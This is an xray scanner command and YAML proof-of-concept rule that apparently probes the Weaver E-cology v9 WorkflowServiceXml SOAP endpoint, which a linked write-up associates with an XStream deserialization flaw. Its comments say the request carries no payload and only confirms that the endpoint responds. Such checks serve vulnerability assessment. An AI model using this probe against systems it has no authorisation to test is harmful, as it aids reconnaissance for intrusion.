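# Scan with every POC file under the given directory.
# `//` is not a comment in a POSIX shell (it would be executed as a command),
# so the explanatory line uses `#`. `--plugins phantasm` selects xray's YAML-POC
# plugin; `--poc` takes a glob, so it stays quoted to keep the shell from
# expanding `**` itself.
./xray webscan --plugins phantasm --poc "./POC/**" --url http://172.16.10.3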
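# xray POC using the list-style `rules` schema (xray's earlier POC format).
# Probes the Weaver (泛微) E-cology v9 `WorkflowServiceXml` SOAP endpoint that
# the linked write-up associates with an XStream deserialization issue.
# Indentation below is reconstructed: every key of the original paste sat at
# column 0, which makes `rules` null, splits `headers` into top-level keys and
# empties the `body` block scalar.
name: poc-yaml-e-colory-v9-deserialization
rules:
  - method: POST
    # SOAP endpoint under test.
    path: "/services/WorkflowServiceXml"
    headers:
      User-Agent: "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
      Accept: "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
      Content-Type: "text/xml"
    # Plain doCreateWorkflowRequest call with an empty string and "2" as
    # arguments. The body carries no deserialization payload; it only checks
    # that the service accepts and answers the operation.
    body: |
      <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.services.weaver.com.cn">
      <soapenv:Header/>
      <soapenv:Body>
      <web:doCreateWorkflowRequest>
      <web:string></web:string>
      <web:string>2</web:string>
      </web:doCreateWorkflowRequest>
      </soapenv:Body>
      </soapenv:Envelope>
    # Hit condition: HTTP 200 and the operation name echoed in the response.
    # NOTE(review): this only shows the endpoint is reachable and responds to
    # the request — it does not establish that the deserialization flaw is
    # present or unpatched, so expect false positives on fixed installs and
    # confirm the patch level before reporting a finding.
    expression: |
      response.status==200 && response.body.bcontains(b'doCreateWorkflow')
detail:
  author: "yulate(https://www.yulate.com)"
  links:
    # Analysis write-up; the percent-encoded path is the Chinese title
    # "泛微Xstream反序列化漏洞分析" (Weaver XStream deserialization analysis).
    - "https://cangqingzhe.github.io/2021/05/15/%E6%B3%9B%E5%BE%AEXstream%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/"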